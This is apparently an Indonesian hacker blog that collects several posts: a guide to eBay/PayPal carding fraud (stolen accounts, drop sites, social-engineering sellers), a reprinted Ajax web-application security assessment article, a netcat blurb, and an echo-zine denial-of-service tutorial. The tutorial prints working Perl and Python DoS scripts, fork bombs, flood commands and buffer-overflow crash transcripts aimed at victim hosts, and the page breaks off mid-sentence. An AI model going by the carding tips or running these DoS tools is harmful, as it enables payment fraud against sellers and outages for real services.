Showing posts with label Hacker. Show all posts
Showing posts with label Hacker. Show all posts
Wednesday, March 5, 2008 at 7:16 PM | 0 comments  


Ebay adalah situs lelang terbesar dan paling berhasil di internet.
Ebay adalah sebuah tempat di mana Joe dari Florida dapat menjual kepada Ahmed dari Pakistan.
Ini adalah tempat di mana mimpi dapat menjadi kenyataan dan produk adalah raja.
Umum
Ditemukan tahun 1995 oleh Pierre Omidyar. Omidyar mendirikan kelompok konsultan (Echo Bay Technology) yang memiliki situs ini. Kantor pusat Ebay berada di San Jose – surga bagi perusahaan-perusahaan teknologi tinggi.

Apa yang Bisa Saya Temukan di Sana?
Semuanya. Perabotan, kendaraan, makanan, pakaian dan barang aneh seperti seseorang yang menjual jidatnya untuk keperluan periklanan. Pada bulan Juni 2004, Ebay telah melarang para penjual dari penjualan alcohol dan tembakau. Ebay juga melarang para penjual untuk mengiklankan barang-barang Nazi (foto-foto, buku, dll.).

Carding memalukan emang! Akibatnya, banyak situs belanja online yang memblokir internet protocol (IP) alias alamat komputer internet asal Indonesia. Situs belanja online seperti Amazon.com dan eBay.com misalnya, udah lama nggak menerima pembeli dari Indonesia. Bahkan kalau kamu mau belanja online, sudah banyak formulir pembelian online shop yang nggak mencantumkan nama negara Indonesia. Artinya kita (Indonesia) nggak diperbolehkan belanja di situs itu.

apakah benar ebay melarang pembeli dari indonesia ?
tidak, karena ebay hanyalah mempertemukan antara penjual(seller) dan pembeli. dan larangan untuk pembeli dari indonesia hanyalah dari kebijakan masing² seller saja.

Secara system, ebay menggunakan www.paypal.com sebagai merchant ebay jadi untuk aktifitas carding dapat dipastikan sangat sulit untuk di lakukan.
karena paypal mempunyai system investigasi time yang idealnya adalah 3hari, paypal akan memverified alamat, ip dari account yang login. kata lain bila kamu membeli dari ebay dengan alamat yang berbeda dengan alamat registry paypal dapat di pastikan alamat swiping akan "unverified" dan akan mempunya kemungkinan kecil sekali untuk keberhasilan order kamu. :-)

adakalanya beberapa kejadian berikut meningkatkan keberhasilan kamu dalam ordering ebay.

- Membeli dengan menggunakan account paypal kamu yang legal (data² asli yang resmi).
dapat dipastikan order kamu akan berhasil 85% :P

- Seller dengan swiping wideword.
seller ini menerima pengiriman dimanapun dalam dunia termasuk indonesia negara tercinta :P

- Seller dengan minimum feedback.
seller dengan minimumfeedback, sebagian besar adalah seller yang baru merintis dan mempunyai sedikit pengetahuan untuk menjadi seller
istilah lainya "masih bisa digobloki" :)), akan tetapi juga tidak semua seller dengan minimum feedback adalah seller yang lugu.

- Paypal yang mendukung
paypal yang mendukung maksudnya adalah paypal yang benar² solid untuk dapat digunakan, misalnya empunya account jarang login, sudah verified, nda limit dll.

- Paypal yang mempunyai time investigasi lebih dari 3hari
Secara default mempunyai waktu 3hari/lebih untuk membuat suatu transaksi clear/valid, bila kamu memang disertai keberuntungan pp (paypal) yang kamu gunakan bisa lebih dari 3hari saat digunakan untuk order maka seller menganggap bahwa transsaksi sudah valid/clear.

- Seller yang tergesa² untuk mengirimkan itemnya
nah yang satu ini yang paling maut, seller yang mempunyai harapan dengan cepat merampungkan stanssaksinya.bila kamu menemui seller type kek gini anggep tu keberuntungan kamu, kamu bisa meng'email dan beralasan untuk secepatnya mengirimkan item dengan alasan bla...bla...bla...
bila kamu mempunyai kesempatan ini dan dipadukan dengan "paypal yang mendukung" kemungkinan keberhasilan kamu akan sebakin besar.
kamu bisa menggunakan SE (social engginer) kamu untuk memperdayai seller tersebut.

- DS (Drop Site)
yang dimaksud DS bukan dedicate server lo, tetapi adalah Drop Site atau tempat sementara untuk pembelian barang yang tidak bisa dibeli oleh alamat asli, ds ini bisa berada dengan menggunakan alamat US, NZ, dll.
Ada beberapa pengedia layanan DS ini dalam dunia internet.
maap, penulis tidak bisa memberitahukan vendor penyedia ini. kata lainya "cari tw sendiri la" :P

- Nasib yang beruntung nasib yang beruntung
sangat di perlukan untuk aktifitas order, ada juga beberapa carder yang memilih hari untuk ordering. (cape dech.....) :P

Sekian info yang dapat saya sampaikan, dan info ini hanyalah untuk pengetahuan saja dan tanpa ada maksud pembelajaran negatif.
kejahatan hanya dilakukan oleh niatan kotor, dan penulis tidak bertanggung jawab atas ini.

Posted by admin Labels: ,



Introduction

AJAX and interactive web services form the backbone of “web 2.0” applications. This technological transformation brings about new challenges for security professionals.

This article looks at some of the methods, tools and tricks to dissect web 2.0 applications (including Ajax) and discover security holes using Firefox and its plugins. The key learning objectives of this article are to understand the:

  • web 2.0 application architecture and its security concerns.
  • hacking challenges such as discovering hidden calls, crawling issues, and Ajax side logic discovery.
  • discovery of XHR calls with the Firebug tool.
  • simulation of browser event automation with the Chickenfoot plugin.
  • debugging of applications from a security standpoint, using the Firebug debugger.
  • methodical approach to vulnerability detection.

Web 2.0 application overview

The newly coined term “web 2.0” refers to the next generation of web applications that have logically evolved with the adoption of new technological vectors. XML-driven web services that are running on SOAP, XML-RPC and REST are empowering server-side components. New applications offer powerful end-user interfaces by utilizing Ajax and rich internet application (Flash) components.

This technological shift has an impact on the overall architecture of web applications and the communication mechanism between client and server. At the same time, this shift has opened up new security concerns [ref 1] and challenges.

New worms such as Yamanner, Samy and Spaceflash are exploiting “client-side” AJAX frameworks, providing new avenues of attack and compromising confidential information.


Figure 1. Web 2.0 architecture layout.

As shown in Figure 1, the browser processes on the left can be divided into the following layers:

  • Presentation layer - HTML/CSS provides the overall appearance to the application in the browser window.
  • Logic & Process - JavaScript running in the browser empowers applications to execute business and communication logic. AJAX-driven components reside in this layer.
  • Transport - XMLHttpRequest (XHR) [ref 2]. This object empowers asynchronous communication capabilities and XML exchange mechanism between client and server over HTTP(S).

The server-side components on the right of Figure 1 that typically reside in the corporate infrastructure behind a firewall may include deployed web services along with traditional web application resources. An Ajax resource running on the browser can directly talk to XML-based web services and exchange information without refreshing the page. This entire communication is hidden from the end-user, in other words the end-user would not “feel” any redirects. The use of a “Refresh” and “Redirects” were an integral part of the first generation of web application logic. In the web 2.0 framework they are reduced substantially by implementing Ajax.

Web 2.0 assessment challenges

In this asynchronous framework, the application does not have many “Refreshes” and “Redirects”. As a result, many interesting server-side resources that can be exploited by an attacker are hidden. The following are three important challenges for security people trying to understand web 2.0 applications:

  1. Discovering hidden calls - It is imperative that one identify XHR-driven calls generated by the loaded page in the browser. It uses JavaScript over HTTP(S) to make these calls to the backend servers.
  2. Crawling challenges - Traditional crawler applications fail on two key fronts: one, to replicate browser behavior and two, to identify key server-side resources in the process. If a resource is accessed by an XHR object via JavaScript, then it is more than likely that the crawling application may not pick it up at all.
  3. Logic discovery - Web applications today are loaded with JavaScript and it is difficult to isolate the logic for a particular event. Each HTML page may load three or four JavaScript resources from the server. Each of these files may have many functions, but the event may be using only a very small part of all these files for its execution logic.

We need to investigate and identify the methodology and tools to overcome these hurdles during a web application assessment. For the purpose of this article, we will use Firefox as our browser and try to leverage some of its plugins to combat the above challenges.

Discovering hidden calls

Web 2.0 applications may load a single page from the server but may make several XHR object calls when constructing the final page. These calls may pull content or JavaScript from the server asynchronously. In such a scenario, the challenge is to determine all XHR calls and resources pulled from the server. This is information that could help in identifying all possible resources and associated vulnerabilities. Let's start with a simple example.

Suppose we can get today’s business news by visiting a simple news portal located at:

http://example.com/news.aspx

The page in the browser would resemble the screenshot illustrated below in Figure 2.


Figure 2. A simple news portal page.

Being a web 2.0 application, Ajax calls are made to the server using an XHR object. We can determine these calls by using a tool known as Firebug [ref 3]. Firebug is a plug-in to the Firefox browser and has the ability to identify XHR object calls.

Prior to browsing a page with the plugin, ensure the option to intercept XHR calls is selected, as shown in Figure 3.

Figure 3.
Figure 3. Setting Firebug to intercept XMLHttpRequest calls.

With the Firebug option to intercept XMLHttpRequest calls enabled, we browse the same page to discover all XHR object calls made by this particular page to the server. This exchange is shown in Figure 4.

Figure 4.
Figure 4. Capturing Ajax calls.

We can see several requests made by the browser using XHR. It has loaded the dojo AJAX framework from the server while simultaneously making a call to a resource on the server to fetch news articles.

http://example.com/ getnews.aspx?date=09262006

If we closely look at the code, we can see following function in JavaScript:

function getNews()
{
var http;
http = new XMLHttpRequest();
http.open("GET", " getnews.aspx?date=09262006", true);
http.onreadystatechange = function()
{
if (http.readyState == 4) {
var response = http.responseText;
document.getElementById('result').innerHTML = response;
}
}
http.send(null);
}

The preceding code makes an asynchronous call to the backend web server and asks for the resource getnews.aspx?date=09262006. The content of this page is placed at the ‘result’ id location in the resulting HTML page. This is clearly an Ajax call using the XHR object.

By analyzing the application in this format, we can identify vulnerable internal URLs, querystrings and POST requests as well. For example, again using the above case, the parameter “date” is vulnerable to an SQL injection attack.

Crawling challenges and browser simulation

An important reconnaissance tool when performing web application assessment is a web crawler. A web crawler crawls every single page and collects all HREFs (links). But what if these HREFs point to a JavaScript function that makes Ajax calls using the XHR object? The web crawler may miss this information altogether.

In many cases it becomes very difficult to simulate this environment. For example, here is a set of simple links:

The “go1” link when clicked will execute the getMe() function. The code for getMe() function is as shown below. Note that this function may be implemented in a completely separate file.

function getMe()
{
var http;
http = new XMLHttpRequest();
http.open("GET", "hi.html", true);
http.onreadystatechange = function()
{
if (http.readyState == 4) {
var response = http.responseText;
document.getElementById('result').innerHTML = response;
}
}
http.send(null);
}

The preceding code makes a simple Ajax call to the hi.html resource on the server.

Is it possible to simulate this click using automation? Yes! Here is one approach using the Firefox plug-in Chickenfoot [ref 4] that provides JavaScript-based APIs and extends the programmable interface to the browser.

By using the Chickenfoot plugin, you can write simple JavaScript to automate browser behavior. With this methodology, simple tasks such as crawling web pages can be automated with ease. For example, the following simple script will “click” all anchors with onClick events. The advantage of this plug-in over traditional web crawlers is distinct: each of these onClick events makes backend XHR-based AJAX calls which may be missed by crawlers because crawlers try to parse JavaScript and collect possible links but cannot replace actual onClick events.

l=find('link')
for(i=0;i

You can load this script in the Chickenfoot console and run it as shown in Figure 5.

Figure 5.
Figure 5. Simulating onClick AJAX call with chickenfoot.

This way, one can create JavaScript and assess AJAX-based applications from within the Firefox browser. There are several API calls [ref 5] that can be used in the chickenfoot plugin. A useful one is the “fetch” command to build a crawling utility.

Logic discovery & dissecting applications

To dissect client-side Ajax-based applications, one needs to go through each of the events very carefully in order to determine process logic. One way of determining the entire logic is to walk through each line of code. Often, each of these event calls process just a few functions from specific files only. Hence, one needs to use a technique to step through the relevant code that gets executed in a browser.

There are a few powerful debuggers for JavaScript that can be used to achieve the above objective. Firebug is one of them. Another one is venkman [ref 6]. We shall use Firebug again in our example.

Let’s take a simple example of a login process. The login.html page accepts a username and password from the end-user, as shown in Figure 6. Use the “inspect” feature of Firebug to determine the property of the form.

Figure 6.
Figure 6. Form property inspection with Firebug.

After inspecting the form property, it is clear that a call is made to the “auth” function. We can now go to the debugger feature of Firebug as illustrated in Figure 7 and isolate internal logic for a particular event.

Figure 7.
Figure 7. Debugging with Firebug.

All JavaScript dependencies of this particular page can be viewed. Calls are made to the ajaxlib.js and validation.js scripts. These two scripts must have several functions. It can be deduced that the login process utilizes some of these functions. We can use a “breakpoint” to step through the entire application. Once a breakpoint is set, we can input credential information, click the “Submit” button and control the execution process. In our example, we have set a breakpoint in the “auth” function as shown in Figure 8.

Figure 8.
Figure 8. Setting a breakpoint and controlling execution process.

We now step through the debugging process by clicking the “step in” button, which was highlighted in Figure 8. JavaScript execution moves to another function, userval, residing in the file validation.js as shown in Figure 9.

Figure 9.
Figure 9. Moving to validation.js script page.

The preceding screenshot shows the regular expression pattern used to validate the username field. Once validation is done execution moves to another function callGetMethod as shown in Figure 10.

Figure 10.
Figure 10. Making an Ajax call.

Finally, at the end of the execution sequence, we can observe the call to backend web services as being made by the XHR object. This is shown in Figure 11.

Figure 11.
Figure 11. Web services call on the Firebug console.

Here we have identified the resource location for the backend web services:

http://example.com/2/auth/ws/login.asmx/getSecurityToken?username=amish&password=amish

The preceding resource is clearly some web services running under the .NET framework. This entire dissection process has thrown up an interesting detail: we've found a user validation routine that can be bypassed very easily. It is a potential security threat to the web application.

Taking our assessment further, we can now access the web service and its endpoints by using a WSDL file and directly bruteforce the service. We can launch several different injection attacks - SQL or XPATH - with tools such as wsChess [ref 7].

In this particular case, the application is vulnerable to an XPATH injection. The methodology for web services assessment overall is different and is outside the scope of this article. However this walkthrough technique helps identify several client-side attacks such as XSS, DOM manipulation attacks, client-side security control bypassing, malicious Ajax code execution, and so on.

Conclusion

Service-oriented architecture (SOA), Ajax, Rich Internet Applications (RIA) and web services are critical components to next generation web applications. To keep pace with these technologies and combat next-generation application security challenges, one needs to design and develop different methodologies and tools. One of the efficient methodologies of assessing applications is by effectively using a browser.

In this article we have seen three techniques to assess web 2.0 applications. By using these methodologies it is possible to identify and isolate several Ajax-related vulnerabilities. Browser automation scripting can assist us in web asset profiling and discovery, that in turn can help in identifying vulnerable server-side resources.

Next generation applications use JavaScript extensively. Smooth debugging tools are our knights in shining armor. The overall techniques covered in this article is a good starting point for web 2.0 assessments using Firefox.

References

[ref 1] Ajax security,
http://www.securityfocus.com/infocus/1868
[ref 2] XHR Object specification, http://www.w3.org/TR/XMLHttpRequest/
[ref 3] Firebug download, https://addons.mozilla.org/firefox/1843/; Firebug usage, http://www.joehewitt.com/software/firebug/docs.php
[ref 4] Chickenfoot quick start, http://groups.csail.mit.edu/uid/chickenfoot/quickstart.html
[ref 5] Chickenfoot API reference - http://groups.csail.mit.edu/uid/chickenfoot/api.html
[ref 6] Venkman walkthrough, http://www.mozilla.org/projects/venkman/venkman-walkthrough.html
[ref 7] wsChess, http://net-square.com/wschess

About the author

Shreeraj Shah, BE, MSCS, MBA, is the founder of Net Square and leads Net Square’s consulting, training and R&D activities. He previously worked with Foundstone, Chase Manhattan Bank and IBM. He is also the author of Hacking Web Services (Thomson) and co-author of Web Hacking: Attacks and Defense (Addison-Wesley). In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, etc. You can read his blog at http://shreeraj.blogspot.com/.

Posted by admin Labels:
Thursday, November 29, 2007 at 12:06 AM | 0 comments  



by Hobbit
Platforms: AIX, BSDI, DG-UX, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD, SCO, Solaris, SunOS, True64 UNIX, UNIX
Categories: Network, Utilities
Version:
URL: http://www.vulnwatch.org/netcat/
Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities. Perhaps some equivalent to netcat, or "nc" should have been written and distributed ten years earlier as another one of those cryptic but fundamental Unix tools that we all use daily without even thinking about it.

netcat download
Posted by admin Labels:
Monday, November 26, 2007 at 11:43 PM | 0 comments  


echo-zine 02
Oleh: MOBY (echo-staff)
moby@echo.or.id || mobygeek@telkom.net


.o0 Kata Pengantar

Pada dasarnya saya mencoba memberikan gambaran umum tentang Denial of
Service atau yang lebih kita kenal dengan DoS. Beberapa pertanyaan
yang mungkin bisa terjawab diantaranya :

1. Apa itu DoS ?
2. Apa motif cracker untuk melakukan itu ?
3. Bagaimana cara melakukannya ?
4. Apa yang harus saya lakukan untuk mencegahnya ?

Semuanya untuk anda, ENJOY !!.

.o0 Apa itu Denial of Service (DoS) ?

Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis)
atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat
menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus
kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal
(dalam kasus tertentu). Pada dasarnya Denial of Service merupakan serangan
yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana
admin akan berada pada kondisi yang membingungkan antara layanan dan
kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding
terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti
hukum ini.

Beberapa aktifitas DoS adalah:

1. Aktifitas 'flooding' terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk dapat menggunakan layanan.
4. Merusak sistem agar korban tidak dapat menggunakan layanan.


.o0 Motif penyerang melakukan Denial of Service

Menurut Hans Husman (t95hhu@student.tdb.uu.se), ada beberapa motif cracker
dalam melakukan Denial of Service yaitu:

1. Status Sub-Kultural.
2. Untuk mendapatkan akses.
3. Balas dendam.
4. Alasan politik.
5. Alasan ekonomi.
6. Tujuan kejahatan/keisengan.

Satatus subkultural dalam dunia hacker, adalah sebuah unjuk gigi atau lebih
tepat kita sebut sebagai pencarian jati diri. Adalah sebuah aktifitas umum
dikalangan hacker-hacker muda untuk menjukkan kemampuannya dan Denial of
Service merupakan aktifitas hacker diawal karirnya. Alasan politik dan
ekonomi untuk saat sekarang juga merupakan alasan yang paling relevan. Kita
bisa melihat dalam 'perang cyber' (cyber war), serangan DoS bahkan dilakukan
secara terdistribusi atau lebih dikenal dengan istilah 'distribute Denial of
Service'. Beberapa kasus serangan virus semacam 'code-red' melakukan serangan
DoS bahkan secara otomatis dengan memanfaatkan komputer yang terinfeksi,
komputer ini disebut 'zombie' dalam jargon.Lebih relevan lagi, keisengan
merupakan motif yang paling sering dijumpai. Bukanlah hal sulit untuk
mendapatkan program-program DoS, seperti nestea, teardrop, land, boink,
jolt dan vadim. Program-program DoS dapat melakukan serangan Denial of
Service dengan sangat tepat, dan yang terpenting sangat mudah untuk
melakukannya. Cracker cukup mengetikkan satu baris perintah pada Linux Shell
yang berupa ./nama_program argv argc ...


.o0 Denial of Sevice, serangan yang menghabiskan resource.

Pada dasarnya, untuk melumpuhkan sebuah layanan dibutuhkan pemakaian resource
yang besar, sehingga komputer/mesin yang diserang kehabisan resource dan
manjadi hang. Beberapa jenis resource yang dihabiskan diantaranya:

A. Swap Space
B. Bandwidth
C. Kernel Tables
D. RAM
E. Disk
F. Caches
G. INETD

A. Swap Space

Hampir semua sistem menggunakan ratusan MBs spasi swap untuk melayani permintaan
client. Spasi swap juga digunakan untuk mem-'forked' child process. Bagaimanapun
spasi swap selalu berubah dan digunakan dengan sangat berat. Beberapa serangan
Denial of Service mencoba untuk memenuhi (mengisi) spasi swap ini.

B. Bandwidth

Beberapa serangan Denial of Service menghabiskan bandwidth.

C. Kernel Tables

Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi
memori kepada kernel juga merupakan target serangan yang sensitif. Kernel
memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak
bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.

D. RAM

Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak
mau harus di re-boot.

E. Disk

Serangan klasik banyak dilakukan dengan memenuhi Disk.

F. Caches

G. INETD

Sekali saja INETD crash, semua service (layanan) yang melalui INETD tidak akan
bekerja.


.o0 Teknik Melakukan Denial of Service

Melakukan DoS sebenarnya bukanlah hal yang sulit dilakukan. Berhubung DoS merupakan
dampak buruk terhadap sebuah layanan publik, cara paling ampuh untuk menghentikannya
adalah menutup layanan tersebut. Namun tentu saja hal ini tidak mengasikkan dan juga
tidak begitu menarik.
Kita akan bahas tipe-tipe serangan DoS.

1. SYN-Flooding
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole'
pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang
lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of
Service dengan mencegahmenolak cracker untuk mengakses sistem.
2. Pentium 'FOOF' Bug
Merupakan serangan Denial of Service terhadap prosessor Pentium yang
menyebabkan sistem menjadi reboot. Hal ini tidak bergantung terhadap jenis
sistem operasi yang digunakan tetapi lebih spesifik lagi terhadap prosessor
yang digunakan yaitu pentium.
3. Ping Flooding
Ping Flooding adalah brute force Denial of Service sederhana. Jika serangan
dilakukan oleh penyerang dengan bandwidth yang lebih baik dari korban, maka
mesin korban tidak dapat mengirimkan paket data ke dalam jaringan (network).
Hal ini terjadi karena mesin korban di banjiri (flood) oleh peket-paket ICMP.
Varian dari serangan ini disebut "smurfing"
(http://www.quadrunner.com/~chuegen/smurf.txt).

Serangan menggunakan exploits.

Beberapa hal yang harus dipahami sebelum melakukan serangan ini adalah:
A. Serangan membutuhkan Shell Linux (Unix/Comp)
B. Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan
fungsi search agar lebih mudah)
C. Menggunakan/membutuhkan GCC (Gnu C Compiler)

1. KOD (Kiss of Death)
Merupakan tool Denial of Service yang dapat dugunakan untuk menyerang Ms.
Windows pada port 139 (port netbios-ssn). Fungsi utama dari tool ini adalah
membuat hang/blue screen of death pada komputer korban.
Cara penggunaan:
A. Dapatkan file kod.c
B. Compile dengan Gcc: $ gcc -o kod kod.c
C. Gunakan: $ kod [ip_korban] -p [port] -t [hits]
Kelemahan dari tool ini adalah tidak semua serangan berhasil, bergantung
kepada jenis sistem operasi dan konfigurasi server target (misalmya:
blocking)
2. BONK/BOINK
Bong adalah dasar dari teardrop (teardrop.c). Boink merupakan Improve dari
bonk.c yang dapat membuat crash mesin MS. Windows 9x dan NT
3. Jolt
Jolt sangat ampuh sekali untuk membekukan Windows 9x dan NT. Cara kerja Jolt
yaitu mengirimkan serangkaian series of spoofed dan fragmented ICMP Packet
yang tinggi sekali kepada korban.
4. NesTea
Tool ini dapat membekukan Linux dengan Versi kernel 2.0. kebawah dan Windows
versi awal. Versi improve dari NesTea dikenal dengan NesTea2
5. NewTear
Merupakan varian dari teardrop (teardrop.c) namun berbeda dengan bonk
(bonk.c)
6. Syndrop
Merupakan 'serangan gabungan' dari TearDrop dan TCP SYN Flooding. Target
serangan adalah Linux dan Windows
7. TearDrop
TearDrop mengirimkan paket Fragmented IP ke komputer (Windows) yang terhubung
ke jaringan (network). Serangan ini memanfaatkan overlapping ip fragment, bug
yang terdapat pada Windowx 9x dan NT. Dampak yang timbul dari serangan ini
adalah Blue Screen of Death

Serangan langsung (+ 31337)

1. Ping Flood
Membutuhkan akses root untuk melakukan ini pada sistem Linux. Implementasinya
sederhana saja, yaitu dengan mengirimkan paket data secara besar-besaran.
bash # ping -fs 65000 [ip_target]
2. Apache Benchmark
Program-program Benchmark WWW, digunakan untuk mengukur kinerja (kekuatan)
suatu web server, namun tidak tertutup kemungkinan untuk melakukan
penyalahgunaan.
bash $ /usr/sbin/ab -n 10000 -c 300 \
http://korban.com/cgi-bin/search.cgi?q=kata+yang+cukup+umum
(diketik dalam 1 baris!)
Akan melakukan 10000 request paralel 300 kepada host korban.com
3. Menggantung Socket
Apache memiliki kapasitas jumlah koneksi yang kecil. Konfigurasi universal
oleh Apache Software Foundation adalah MaxClients 150, yang berarti hanyak
koneksi yang diperbolehkan mengakses Apache dibatasi sebanyak 150 clients.
Jumlah ini sedikit banyak dapat berkurang mengingat browser lebih dari 1
request simultan dengan koneksi terpisah-pisah.

Penyerang hanya melakukan koneksi lalu diam, pada saat itu apache akan
menunggu selama waktu yang ditetukan direktif TimeOut (default 5 menit).
Dengan mengirimkan request simultan yang cukup banyak penyerang akan memaksa
batasan maksimal MaxClients. Dampak yang terjadi, clien yang mengakses apache
akan tertunda dan apa bila backlog TCP terlampaui maka terjadi penolakan,
seolah-olah server korban tewas.

Script gs.pl (gantung socket)

#!/usr/bin/perl
#
# Nama Script : gs.pl
# Tipe : Denial of Service (DoS)
# Auth : MOBY || eCHo --> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[1]) {
print "Gunakan: perl gs.pl [host] [port] \n";
exit;
}
for (1..1300) {
$fh{$_}=new IO::Socket::INET
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto => "tcp"
or die; print "$_\n"
}
# END. 27 Oktober 2003
# Lakukan dari beberapa LoginShell (komputer) !

DoS-ing Apache lagi !!

Beberapa contoh skrip perl untuk melakukan DoS-ing secara local.

1. Fork Bomb, habiskan RAM

#!/usr/bin/perl
fork while 1;

2. Habiskan CPU

#!/usr/bin/perl
for (1..100) { fork or last }
1 while ++$i

3. Habiskan Memory

#!/usr/bin/perl
for (1..20) { fork or last }
while(++$i) { fh{$i} = "X" x 0xff; }

4. Serangan Input Flooding
Saya mengamati serangan ini dari beberapa advisories di BugTraq. Remote
Buffer Overflow yang menghasilkan segmentation fault (seg_fault) dapat
terjadi secara remote jika demon (server) tidak melakukan verifikasi input
sehingga input membanjiri buffer dan menyebabkan program dihentikan secara
paksa.

Beberapa 'proof of concept' dapat dipelajari melalui beberapa contoh ini.

1. Serangan kepada IISPop EMAIL Server.
Sofie : Email server
Vendor : http://www.curtiscomp.com/
TIPE : Remote DoS

IISPop akan crash jika diserang dengan pengiriman paket data sebesar 289999 bytes,
versi yang vuneral dan telah di coba adalah V: 1.161 dan 1.181

Script: iispdos.pl

#!/usr/bin/perl -w
#
# $0_ : iispdos.pl
# Tipe serangan : Denial of service
# Target : IISPop MAIL SERVER V. 1.161 & 1.181
# Auth : MOBY & eCHo -> moby@echo.or.id || mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
if (!$ARGV[0]) {
print "Gunakan: perl iispdos.pl [host] \n";
exit;
}
# Data 289999 bytes
$buff = "A" x 289999;

print "Connecting ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "110",
Proto=> "tcp") or die;
print "Error: $_\n";
print "Connect !!\n";
print $connect "$buff\n";
close $connect;
print "Done \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "110",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# END.

2. Membunuh wzdftpd.
Sofie : wzdftpd
Vendor : http://www.wzdftpd.net

Proof of Concept:

% telnet 127.0.0.1 21
Trying 127.0.0.1...
Connected to localhost.novel.ru.
Escape character is '^]'.
220 wzd server ready.
USER guest
331 User guest okay, need password.
PASS any
230 User logged in, proceed.
PORT
Connection closed by foreign host.
% telnet 127.0.0.1 21
Trying 127.0.0.1...
telnet: connect to address 127.0.0.1: Connection refused
telnet: Unable to connect to remote host

wzdftpd crash setelah diberikan perintah/command PORT !

3. Serangan 32700 karakter, DoS BRS WebWeaver.
Sofie : BRS WebWeaver V. 1.04
Vendor : www.brswebweaver.com
BugTraqer : euronymous /F0KP

}------- start of fadvWWhtdos.py ---------------{

#! /usr/bin/env python
## #!/usr/bin/python (Py Shebang, MOBY)
###
# WebWeaver 1.04 Http Server DoS exploit
# by euronymous /f0kp [http://f0kp.iplus.ru]
########
# Usage: ./fadvWWhtdos.py
########

import sys
import httplib

met = raw_input("""
What kind request you want make to crash webweaver?? [ HEAD/POST ]:
""")
target = raw_input("Type your target hostname [ w/o http:// ]: ")
spl = "f0kp"*0x1FEF
conn = httplib.HTTPConnection(target)
conn.request(met, "/"+spl)
r1 = conn.getresponse()
print r1.status

}--------- end of fadvWWhtdos.py ---------------{

Serangan diatas mengirimkan 32700 karakter yang menyebabkan server crash !

4. Buffer Overflow pada MailMAX 5
Sofie : IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.8)
Vendor : http://www.smartmax.com
BugTraqer : matrix at 0x36.org

Remote Buffer Overflow terjadi apa bila user mengirimkan input (arg) kepada command
SELECT. Dampak dari serangan ini adalah berhentiya server dan harus di-restart secara
manual.

Contoh eksploitasi:
--------[ transcript ]-------
nc infowarfare.dk 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "RealUser@infowarfare.dk" "HereIsMyPassword"
0001 OK User authenticated.
0002 SELECT "aaa...[256]...aaaa"
--------[ transcript ]-------

Perhatian !, contoh eksploitasi diatas menggunakan NetCat (nc), anda bisa dapatkan tool
ini pada url: http://packetstormsecurity.nl dengan kata kunci 'nc' atau 'netcat'


Jika kita perhatikan, serangan flooding memiliki kesamaan, yaitu - tentu saja -
membanjiri input dengan data yang besar. Serangan akan lebih efektif jika dilakukan pada
komputer esekutor yang memiliki bandwidth lebar.

Dengan mempelajari kesamaan serangan, step yang dilakukan adalah:
A. Connect ke korban (host, port).
B. Kirimkan paket data dalam jumlah besar.
C. Putuskan koneksi > selesai.

Dari step diatas, kita bisa membuat sebuah skrip universal untuk melakukan serangan DoS.
Skrip ini membutuhkan 3 argumen yaitu: target_address (host/ip target), target_port (
port koneksi ke server korban), dan data (jumlah paket data yang akan dikirim).

-- udos.pl --

#!/usr/bin/perl
#
# $0 : udos.pl
# Auth : MOBY & eCHo -> moby@echo.or.id | mobygeek@telkom.net
# URL : www.echo.or.id
#
use IO::Socket;
#
if (!$ARGV[2]) {
print "Gunakan % perl udos.pl [host] [port] [data] \n";
print "Contoh :\n";
print "\t $ perl udos.pl 127.0.0.1 21 50000 \n";
exit;
}
# Siapkan data
$buffer = "A" x $ARGV[2];
# Connect -> Korban
print "Connecting ... -> $ARGV[0] \n";
$con = new IO::Socket::INET (
PeerAddr=> "$ARGV[0]",
PeerPort=> "$ARGV[1]",
Proto=> "tcp") or die;
print "Error: $_ \n";
# Connect !
print "Connect !! \n";
print $con "$buffer\n";
close $con;
print "Done. \n";
print "POST TESTING setelah serangan \n";
print "TEST ... >> $ARGV[0] \n";
$connect = new IO::Socket::INET (
PeerAddr => "$ARGV[0]",
PeerPort => "$ARGV[1]",
Proto => "tcp") or die;
print "Done !!, $ARGV[0] TEWAS !! \n";

print "Gagal !! \n";
close $connect;
# End.

-- udos.pl --

Skrip sederhana diatas hanya melakukan hubungan dengan server korban,
lalu mengirimkan flood dan melakukan post testing. Dengan sedikit
